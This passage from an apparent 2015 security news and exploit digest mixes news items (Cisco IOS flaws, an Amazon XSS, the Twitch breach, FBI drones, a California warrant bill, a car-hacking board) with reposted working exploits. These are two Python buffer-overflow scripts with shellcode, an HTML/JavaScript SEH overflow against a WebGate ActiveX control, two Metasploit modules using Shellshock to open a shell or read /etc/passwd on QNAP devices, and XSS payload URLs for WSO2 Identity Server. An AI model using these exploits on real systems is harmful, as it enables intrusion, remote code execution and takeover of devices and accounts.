     Kansa modules can be run as standalone utilities outside of the Kansa framework. Why might you want to do this? Consider netstat -naob: the output of the command line utility is ugly and doesn't easily lend itself to analysis. Running Modules\Net\Get-Netstat.ps1 as a standalone script will call netstat -naob, but it will return PowerShell objects in an easy to read, easy to analyze format. You can easily convert its output to CSV, TSV or XML using normal PowerShell cmdlets. Here's an example:

         .\Get-Netstat.ps1 | ConvertTo-CSV -Delimiter "`t" -NoTypeInformation | % { $_ -replace "`"" } | Set-Content netstat.tsv

     The result of the above will be a file called netstat.tsv containing unquoted, tab-separated values for netstat -naob's output.

     Caveats: PowerShell relies on the Windows API. Your adversary may use subterfuge.*

     * Collectors can be written to bypass the Windows API as well. Get-RekallPslist.ps1 for example.

     Link: https://github.com/davehull/Kansa
  14. Cisco's turned up vulnerabilities in automation software that open the door to denial-of-service and limited access to devices. The company's Autonomic Network Infrastructure (ANI) feature in IOS provides self-management for various IPv6-supporting routers and Ethernet switches. One of the ANI features is to remove the need for pre-staging in network bootstrap, allowing devices to join a network at startup so they can be configured over the network rather than through a local port. The three vulnerabilities exploit this in various ways: Registration authority spoofing (CVE-2015-0635) – insufficient validation of the Autonomic Networking (AN) response message allows an attacker to spoof the message, bootstrapping a device into an untrusted domain (with limited control over it), DoS-ing the device, or disrupting the victim's domain; DoS using spoofed messages (CVE-2015-0636) – in IOS and IOS XE software, a spoofed “overloaded AN” message resets the state machine; Device reload (CVE-2015-0637) – received AN messages are insufficiently validated, allowing an attacker to trigger system reloads using crafted messages. Devices running Cisco IOS and IOS XE with ANI enabled are vulnerable. Cisco has released patches for the vulnerable systems listed in its advisory. Source
  15. Amazon has patched a dangerous cross-site scripting (XSS) vulnerability in its website that exposed accounts to hijacking. A Brazilian hacker using the handle @bruteLogic published the then-zero-day flaw to XSSposed.org on Saturday without tipping off the book giant. Amazon swatted the flaws two days later. The time between disclosure and patch opened what the hacker told Beta News was a chance for Amazon accounts to be compromised and web browsers exploited. His reasoning for full disclosure was that Amazon did not pay cash for bug bounty reports. He says the vulnerability allowed attackers to view Amazon users' credit cards and to purchase items in their name, provided a victim clicked on a crafted malicious link. Amazon has been contacted for comment. Cross-site scripting vulnerabilities are a persistent scourge on internet assets. They allow attackers to quietly target victims using vulnerable web applications that do not properly check input. The Open Web Application Security Project puts XSS as the third worst application security blunder, behind broken authentication and injection. The web hole follows Amazon's September kerfuffle after it reintroduced a flaw in its Kindle management page that could have allowed attackers to inject malcode into a book's title, which could have commandeered accounts. Source
  16. To protect its 100 million users, the live-stream video service for gamers says it has reset all passwords and disconnected user accounts from Twitter and YouTube. Twitch, which enables gamers to live-stream their game play, has likely been hacked. Twitch, which is owned by Amazon, said in a blog post Monday that it discovered possible "unauthorized access to some Twitch user account information." The company provided few details but did say that all user passwords have been reset and that accounts connected to Twitter and YouTube to promote live streams have been disconnected. According to the Wall Street Journal, which obtained a copy of an e-mail that Twitch sent to affected users, Twitch said that passwords, e-mail addresses, user names, home addresses, phone numbers, and dates of birth may have been accessed. The company has not outright confirmed a breach, saying that it's still investigating. Amazon bought Twitch last year for $970 million. Twitch is the most popular social video platform for gamers, allowing them to live stream game content and communicate with friends and fans. In February, Twitch boasted that its community now has more than 100 million members and 1.5 million broadcasters. In February 2014, Twitch accounted for 1.8 percent of all US Internet traffic at peak times, putting it behind Netflix, Google, and Apple, which combined account for more than 58 percent share. Meanwhile, Hulu, Facebook, and Amazon, among others, trailed Twitch. If Twitch was hacked, it would be just the latest in a string of attacks on major companies over the past few years. In December 2013, retail giant Target said that hackers stole credit card data for more than 110 million customers. Major hacks reported in 2014 and 2015 include those on department store Neiman Marcus, restaurant chain P.F. Chang's, crafts-supplies chain Michaels Stores, hardware chain Home Depot, office-supplies chain Staples and insurance provider Anthem. 
One of the most notable breaches last year hit Sony Pictures. The hackers released private e-mails of Sony executives, as well as screenings of upcoming films. The Twitch hack may have centered on simply getting data. By accessing the data, hackers could use it in a range of phishing attacks designed to target people through their e-mail addresses and get them to click on links to steal sensitive information. Attacks have also resulted in hackers selling user data on the Web's black market, allowing criminals to steal goods with another person's identity. "Gaming sites have always been a lucrative target," ESET security specialist Mark James said Tuesday. "Not only do they represent gamers that may use the same login and passwords as similar sites but they also enable the possibility of other electronic goods to be stolen and sold elsewhere, in game items, in game gold." Twitch said it plans to provide more details about the incident. Meanwhile, the company has urged its users to use strong passwords. James agreed. "There's no perfect advice for when your details are stolen but changing your password is certainly one of the best," James said. "The very best is to strengthen the importance of having unique passwords for each and every login you have - that way if your password is found it's useless on another site." Twitch did not immediately respond to CNET's request for comment. Source
  17. A new report prepared by the United States Department of Justice’s internal watchdog has revealed that two major federal law enforcement agencies have spent millions of dollars on 23 drones that for some reason, are not operational. The report, which was published on Wednesday by the DOJ’s Office of the Inspector General, also concludes that the FBI is the “only DOJ component that operationally deploys its own UAS,” using the government acronym for Unmanned Aerial System, or drone. The DOJ OIG report comes less than three months after the Department of Homeland Security OIG concluded that after eight years, the drone program run by Customs and Border Protection was ineffective. The DOJ report also includes a few other new details, including confirmation of the 2013 assertion by then-FBI Director Robert Mueller that the agency uses drones “very seldom.” The DOJ OIG found that the FBI has only used its drones for 13 cases between 2004 and 2013. When it did fly those missions, however, the agency also determined that it apparently did not need a warrant to conduct aerial surveillance. As was first noted by Emptywheel, a government and national security blog, the DOJ OIG report also states that the FBI spent $3 million on 34 drones “and associated control stations.” But for some reason, only half of those drones are considered operational, suggesting that half of the money has effectively been wasted. Another problem is that the FBI apparently only has two drone pilots at the moment, who have to be physically shuttled around the country when a drone operation is in use. Worse still, it has been hard to train more, as the report states:

Drones join the Navy?

The second largest agency within the DOJ to use drones was the Bureau of Alcohol, Tobacco and Firearms, which spent a total of $600,000 on six drones and related equipment, but they too were “unsuitable" for unspecified reasons.
As the DOJ OIG notes: Apparently just a week after the ATF gave up its six drones, it then went out and bought five more for $15,000. Then after realizing it needed a Certificate of Authorization from the Federal Aviation Administration in order to fly them, they were grounded. Source
  18. #!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Related Vulnerability/ies:
# http://www.exploit-db.com/exploits/8628/
#POC:
#IMG1:
#http://i.imgur.com/87sXIj8.png

from struct import pack

file="crack.ram"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")

writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()
Source
  19. <html>
<!--
# Exploit Title: WebGate eDVR Manager WESPMonitor.WESPMonitorCtrl LoadImage Stack Buffer Overflow Remote Code Execution (0 day)
# Date: 26th March, 2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi_htdocs/eng/dcenter/view.php?id=wgi_eng&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=531&category_group=4&category_product=74&category=174
# Version: 1, 6, 42, 0
# Tested on: Windows XP SP3 (IE6/7/8)
# CVE : 2015-2097

targetFile = "C:\Windows\System32\WESPSDK\WESPMonitor.dll"
prototype = "Sub LoadImage ( ByVal bstrFullPath As String )"
memberName = "LoadImage"
progid = "WESPMONITORLib.WESPMonitorCtrl"
argCount = 1

For full analysis of the exploit refer http://blog.disects.com/2015/03/webgate-edvr-manager.html
-->
<object classid='clsid:B19147A0-C2FD-4B1F-BD20-3A3E1ABC4FC3' id='target'> </object>
<script>
var arg1 = "";
nops = "";
var buff = "";
for(i=0;i<268;i++) { arg1 += "B"; }
nseh = "\xeb\x10\x90\x90"; //jmp over addr
seh = "\x71\x47\x01\x10"; //pop pop ret addr
document.write("</br>"+"Lengths: arg1="+arg1.length+" seh="+seh.length+"</br>");
for(i=0;i<200;i++) { nops += "\x90"; }
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
for(i=0;i<(4000-(arg1.length + seh.length + nseh.length + nops.length+ sc.length));i++) { buff += "A"; }
// [junk buffer][next SEH(jump)][SE Handler (pop pop ret)][Shellcode]
fbuff = arg1 + nseh + seh + nops + sc + buff;
target.LoadImage(fbuff);
</script>
</html>
Source
  20. # Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##

require 'msf/core'
require 'net/telnet'

class Metasploit3 < Msf::Auxiliary

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::CommandShell

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'QNAP admin shell via Bash Environment Variable Code Injection',
      'Description' => %q{
        This module allows you to spawn a remote admin shell (utelnetd) on a QNAP device via Bash Environment Variable Code Injection.
        Affected products: All Turbo NAS models except TS-100, TS-101, TS-200
      },
      'Author'      => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-6271'], #aka ShellShock
          ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
        ],
      'Platform'    => ['unix']
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
      OptPort.new('LTELNET', [true, 'Set the remote port where the utelnetd service will be listening','9993'])
    ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path),
        'agent'  => "() { :;}; echo; /usr/bin/id"
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    end

    if !res
      return Exploit::CheckCode::Unknown
    elsif res.code== 302 and res.body.include? 'uid'
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit_telnet()
    telnetport = datastore['LTELNET']

    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
    print_status("#{rhost}:#{rport} - Sending exploit")

    begin
      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })

      if sock
        print_good("#{rhost}:#{rport} - Backdoor service spawned")
        add_socket(sock)
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not spawned")
      end

      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
      merge_me = {
        'USERPASS_FILE' => nil,
        'USER_FILE'     => nil,
        'PASS_FILE'     => nil,
        'USERNAME'      => nil,
        'PASSWORD'      => nil
      }
      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
    rescue
      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service not handled")
    end
    return
  end

  def run
    begin
      telnetport = datastore['LTELNET']
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path),
        'agent'  => "() { :;}; /bin/utelnetd -l/bin/sh -p#{telnetport} &"
      })
    rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable => e
      fail_with(Failure::Unreachable, e)
    ensure
      disconnect
    end

    exploit_telnet()
  end
end
Source
  21. # Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
# Date: 7 February 2015
# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
# Employer homepage: http://www.securegroup.it
# Vendor homepage: http://www.qnap.com
# Version: All Turbo NAS models except TS-100, TS-101, TS-200
# Tested on: TS-1279U-RP
# CVE : 2014-6271
# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/d3vpp/metasploit-modules
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
      'Description' => %q{
        This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
        Affected products: All Turbo NAS models except TS-100, TS-101, TS-200
      },
      'Author'      => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2014-6271'], #aka ShellShock
          ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
        ],
      'Platform'    => ['unix']
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),
      OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])
    ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path),
        'agent'  => "() { :;}; echo; /usr/bin/id"
      })
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      vprint_error("Connection failed")
      return Exploit::CheckCode::Unknown
    end

    if !res
      return Exploit::CheckCode::Unknown
    elsif res.code== 302 and res.body.include? 'uid'
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def run
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
      'agent'  => "() { :;}; echo; #{datastore['CMD']}"
    })

    if res.body.empty?
      print_error("No data found.")
    elsif res.code== 302
      print_status("#{rhost}:#{rport} - bash env variable injected")
      puts " "
      print_line(res.body)
    end
  end
end
Source
  22. Hi,

WSO2 Identity Server (http://wso2.com/products/identity-server/) version 4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including authentication bypass.

Timeline:
09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure

Vulnerable versions:
IS 4.5.0
IS 4.6.0
IS 5.0.0

Fixed versions:
IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1

Vulnerabilities details:

1) Identity spoofing/authentication bypass.
An attacker needs to log in to WSO2 IS to obtain a valid HTTP session. Given this session he/she can request an OpenID assertion from WSO2 IS for _any_ identity (openid.identity). Thus any authenticated user is able to spoof any identity he/she requests, in order to log in to the RP as a user of his/her will.

2) XSS A - HTML injection
https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e

3) XSS B - HTML injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL

4) XSS C - JavaScript injection
https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL

regards
--
Bartlomiej Balcerek
WCSS CSIRT
Wroclaw Centre for Networking and Supercomputing
Wroclaw University of Technology, Poland
phone: +48 (71) 320-20-79
mail: bartol@pwr.edu.pl
Source
  23. #!/usr/bin/env python
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Mini-stream Ripper v2.7.7.100 Local Buffer Overflow
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/43/Mini-streamRipper.exe?token=1427334864_8d9c5d7d948871f54ae14ed9304d1ddf&fileName=Mini-streamRipper.exe
#[+] Friendly Sites: sec4ever.com
#[+] Twitter: @TCYB3R
#[+] Original POC:
# http://www.exploit-db.com/exploits/11197/
#POC:
#IMG1:
#http://i.imgur.com/ifXYgwx.png
#IMG2:
#http://i.imgur.com/ZMisj6R.png

from struct import pack

file="crack.m3u"
junk="\x41"*35032
eip=pack('<I',0x7C9D30D7)
junk2="\x44"*4
#Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore
#http://www.exploit-db.com/exploits/28996/
shellcode= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")

writeFile = open (file, "w")
writeFile.write(junk+eip+junk2+shellcode)
writeFile.close()
Source
  24. SACRAMENTO, Calif.—A California state bill that would require a warrant to access all kinds of digital data passed its first hurdle after being approved by the Senate Public Safety Committee on Tuesday. Among other sweeping new requirements to enhance digital privacy, the bill notably imposes a warrant requirement before police can access nearly any type of digital data produced by or contained within a device or service. In other words, that would include any use of a stingray, also known as a cell-site simulator, which can not only be used to determine a phone’s location, but can also intercept calls and text messages. During the act of locating a phone, stingrays also sweep up information about nearby phones—not just the target phone. According to the bill's summary: If the California Electronic Communications Privacy Act (CalECPA) passes the California State Senate and the State Assembly, and is signed by the governor, it would mark a notable change for law enforcement in America’s most populous state. However, passage is not a sure thing. Previous versions of the bill were vetoed by the governor twice in 2012 and again in 2013. The bill was introduced in February 2015 by State Senator Mark Leno (D-San Francisco). Texas and other states already have similar laws on the books, while revision to the federal Electronic Communications Privacy Act (ECPA) has stalled for years. California law enforcement agencies, like others nationwide, have been cagey as to how stingray use is requested and carried out. Last week, the Anaheim Police Department published a version of a letter that had been prewritten by the FBI in a poor attempt to provide further disclosure about how they use the surveillance devices.

Only one opposed

In June 2014, the Supreme Court of the United States ruled unanimously in a case known as Riley v. California that law enforcement officials must obtain a warrant before searching the contents of an arrestee’s phone.
Among other changes, the new bill would put the Golden State in compliance with that decision. The Senate Committee on Public Safety approved Senate Bill 178 (SB 178) by a vote of 6-1, with little discussion from the assembled senators. It faced just a modicum of opposition at this stage. "California residents use technology every day to connect, communicate, work and learn," Nicole Ozer, an attorney with the American Civil Liberties Union of California, testified from a prepared statement in favor of the bill. "Our state’s leading technology companies rely on consumer confidence in these services to help power the California economy. "But consumers are increasingly concerned about warrantless government access to their digital information, and for good reason. While technology has advanced exponentially, California privacy law has remained largely unchanged. Law enforcement is increasingly taking advantage of outdated privacy laws to turn mobile phones into tracking devices and to access e-mails, digital documents, and text messages without proper judicial oversight." In the pre-cellphone era, a "pen register and trap and trace order" allowed law enforcement to obtain someone's calling metadata in near real-time from the telephone company. Now, that same data can also be gathered directly by the cops themselves through the use of a stingray. In some cases, police have gone to judges asking for such a device or have falsely claimed the existence of a confidential informant while in fact deploying this particularly sweeping and invasive surveillance tool. Most judges are likely to sign off on a pen register application not fully understanding that police are actually asking for permission to use a stingray. Under federal law, pen registers are granted under a very low standard: authorities must simply show that the information obtained from the pen register is "relevant to an ongoing criminal investigation." 
That is a far lower standard than being forced to show probable cause for a search warrant or wiretap order. A wiretap requires law enforcement to not only specifically describe the alleged crimes but also to demonstrate that all other means of investigation had been exhausted or would fail if they were attempted. California doesn’t actually have a specific pen register statute—a pen/trap application template that Ars recently obtained from the Oakland Police Department under a public records request cites the federal statute. However, that practice goes against a 2003 opinion from the California Attorney General. The AG concluded that because California affords its citizens more privacy under the state constitution than does federal law, a state law enforcement officer cannot use a federal statute for a pen/trap order.

Cops don’t like it

After more testimony, the committee members heard from Marty Vranicar of the California District Attorneys Association (CDAA) and Aaron McGuire, a lobbyist for the California Sheriff's Association (CSA). Vranicar told the committee that the bill would "undermine efforts to find child exploitation," specifically child pornography. "SB 178 threatens law enforcement’s ability to conduct undercover child porn investigation, the so-called peer-to-peer investigations," he said. "Officers, after creating online profiles—these e-mails provide metadata that is the key to providing information. This would effectively end online undercover investigations in California." Ars was unable to obtain the letters filed by Vranicar and McGuire to the committee that more fully outlined their opposition. However, no other members of the public nor other groups spoke up in favor of the law enforcement position.
By contrast, SB 178 has notable support from a number of established organizations and tech companies, including the Council on American Islamic Relations, the California Newspaper Publishers Association, Twitter, Facebook, Microsoft, and Google, among others. After Vranicar and McGuire spoke, they faced just one question from Sen. Joel Anderson (R-San Diego County), who said that he wanted to see revision suggested by the law enforcement establishment. "One of the issues that I have is that people's cellphones are being abused," he said, holding up his iPhone. "It's clear that that's happening. I think you need to figure out how to be part of that solution. "While you want to stop criminal behavior, it can't be at the price of liberty. If you have the right to break into my house, with a warrant and take my computer, that should be the standard for phones as well." The committee seemed unmoved by law enforcement concerns, and passed the bill handily. It now moves to the Senate Appropriations Committee before eventually going on to the entire state Senate. Source
  25. The average automobile today isn’t necessarily secured against hackers, so much as obscured from them: Digitally controlling a car’s electronics remains an arcane, specialized skill among security researchers. But that’s changing fast. And soon, it could take as little as $60 and a laptop to begin messing around with a car’s digital innards. Tomorrow at the Black Hat Asia security conference in Singapore, 24-year-old Eric Evenchick plans to present a new device he calls the CANtact. The open source board, which he hopes to sell for between $60 and $100, connects on one end to a computer’s USB port, and on the other to a car or truck’s OBD2 port, a network port under its dashboard. That makes the CANtact a cheap interface between any PC and a vehicle’s controller area network or CAN bus, the collection of connected computers inside of every modern automobile that control everything from its windows to its brakes. With just that go-between gadget and the open source software that Evenchick is releasing for free, he hopes to make car hacking a far cheaper and more automated process for amateurs. “I realized that there were no good tools for me to play around with this stuff outside of what the auto industry uses, and those are incredibly expensive,” Evenchick says, referring to products sold by companies like Vector that can cost tens of thousands of dollars. “I wanted to build a tool I can get out there, along with software to show that this stuff isn’t terribly complicated.” Over the last several years, researchers have shown that car hacking represents a real security threat. In 2013, for instance, Darpa-funded security researchers Chris Valasek and Charlie Miller showed (with me as their chosen crash-test dummy) that it was possible to send digital commands from a laptop connected to a car’s CAN bus that affected steering, slammed on brakes, or even disabled brakes at some speeds.
Evenchick’s gadget aims to make exactly that sort of testing more accessible to researchers. In their tests, Valasek and Miller used a $150 ECOM cable that they rewired by hand to connect to their test vehicles’ OBD2 ports. (Valasek says a stock cable capable of that connection would have cost $1,200.) Evenchick’s CANtact is designed to make that connection out of the box at a much lower cost. The average coder isn’t familiar with the protocol most cars’ computers rely on to communicate. But Evenchick has written open source software for CANtact that automates much of the manual work of CAN bus hacking. Like the earlier work by Valasek and Miller, the CANtact is designed to send commands in Unified Diagnostics Services, the CAN protocol that auto mechanics use to communicate with electronic control units (or ECUs) throughout a vehicle. That allows anyone to write python scripts that can automatically trigger commands in a car’s digital network that range from turning off its “check engine” light to automatically pumping its brakes. “Most people have no idea there’s all this diagnostic stuff that someone who’s connected to the CAN bus can use to do all these interesting things,” says Evenchick. “What are the extent of those features? And what implementation problems exist that could be big security holes?” For now, actually figuring out what a certain UDS command sent from the CANtact might do in a specific vehicle will largely be a matter of trial and error for amateur car hackers, says Evenchick. But by publishing its software on Github, he hopes the code will become a collection of different hackers’ techniques that target individual vehicle makes and models. “It would be awesome if people messing around with their cars… could work together to build a library [of code] to do all this stuff,” says Evenchick. “You’re a Honda owner, and someone else is a Honda owner. 
